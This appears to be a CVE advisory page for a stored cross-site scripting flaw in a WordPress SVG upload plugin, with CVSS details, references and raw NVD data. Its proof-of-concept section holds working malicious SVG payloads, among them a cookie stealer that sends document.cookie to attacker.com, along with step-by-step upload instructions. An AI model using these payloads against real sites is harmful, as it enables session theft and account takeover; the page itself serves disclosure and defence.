CVE-2025-12457

Description

The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Enable SVG, WebP, and ICO Upload插件 ≤ 1.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC: Malicious SVG file with embedded JavaScript -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>alert('XSS via SVG');</script>
</svg>

<!-- Alternative PoC with event handler -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <image href="x" onerror="alert(document.domain)"/>
</svg>

<!-- Stealer PoC - Cookie stealing -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
  </script>
</svg>

<!-- Steps to exploit:
1. Login to WordPress with Author+ privileges
2. Navigate to Media Library -> Add New
3. Upload the malicious SVG file
4. Access the uploaded SVG file URL
5. JavaScript will execute in victim's browser -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12457
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12457
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12457/
[4] VulDB https://vuldb.com/cve/CVE-2025-12457
[5] https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21
[6] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396265%40enable-svg-webp-ico-upload&new=3396265%40enable-svg-webp-ico-upload&sfp_email=&sfph_mail=
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12457", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396265%40enable-svg-webp-ico-upload&new=3396265%40enable-svg-webp-ico-upload&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve", "source": "[email protected]"}]}}